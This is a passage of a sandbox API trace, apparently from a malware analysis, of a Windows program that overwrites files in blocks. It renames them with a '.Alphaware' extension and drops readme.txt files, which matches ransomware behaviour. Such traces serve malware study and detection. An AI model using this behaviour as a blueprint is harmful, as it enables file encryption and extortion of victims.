lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.923] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.923] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.924] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.924] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.924] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.924] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.925] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.925] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.925] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.926] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.926] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.926] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.926] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.927] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.927] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.927] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.928] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.928] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.928] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.928] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.929] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.929] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.929] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.929] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.930] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.930] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.930] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.930] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.931] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.931] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.931] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.931] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.932] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.932] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.932] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.932] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.933] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.933] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.933] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.933] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.934] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.934] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.934] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.934] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.935] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.935] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0106.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0106.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), fInfoLevelId=0x0, lpFileInformation=0x23ec40 | out: lpFileInformation=0x23ec40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x9199a000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf13e5d)) returned 1 [0106.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8c8) returned 1 [0106.437] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.Alphaware" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.alphaware")) returned 1 [0106.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0106.938] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*" (normalized: "c:\\users\\public\\videos\\sample videos\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9199a000, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9199a000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a730 [0106.939] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9199a000, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9199a000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.939] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x9009b900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0106.939] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9009b900, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x9009b900, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9009b900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0106.939] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x9199a000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf13e5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv.Alphaware", cAlternateFileName="")) returned 1 [0106.939] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x9199a000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf13e5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv.Alphaware", cAlternateFileName="")) returned 0 [0106.939] FindClose (in: hFindFile=0xd8a730 | out: hFindFile=0xd8a730) returned 1 [0106.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0106.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0106.940] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0106.940] SHGetFolderPathW (in: hwnd=0x0, csidl=25, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\Public\\Desktop") returned 0x0 [0106.942] CoTaskMemFree (pv=0xd85a10) [0106.942] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x23e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0106.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0106.943] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*" (normalized: "c:\\users\\public\\desktop\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a790 [0106.943] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.943] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0106.943] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0106.943] FindClose (in: hFindFile=0xd8a790 | out: hFindFile=0xd8a790) returned 1 [0106.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0106.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0106.944] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x80) returned 1 [0106.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0106.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2415948 | out: lpFileInformation=0x2415948*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0106.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0106.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0106.945] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0106.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0106.945] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xae [0106.945] ReadFile (in: hFile=0x26c, lpBuffer=0x2415c00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2415c00*, lpNumberOfBytesRead=0x23eb38*=0xae, lpOverlapped=0x0) returned 1 [0107.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0107.018] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x26c [0107.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0107.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0107.022] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x91ecf020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4)) returned 1 [0107.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0107.022] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Desktop\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\desktop\\desktop.ini.alphaware")) returned 1 [0107.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0107.024] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\readme.txt" (normalized: "c:\\users\\public\\desktop\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x26c [0107.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0107.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0107.029] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*" (normalized: "c:\\users\\public\\desktop\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x91ecf020, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x91ecf020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a790 [0107.029] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x91ecf020, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x91ecf020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.029] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x91ecf020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0107.030] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91ecf020, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x91ecf020, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x91ecf020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0107.030] FindNextFileW (in: hFindFile=0xd8a790, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91ecf020, ftCreationTime.dwHighDateTime=0x1d9897a, 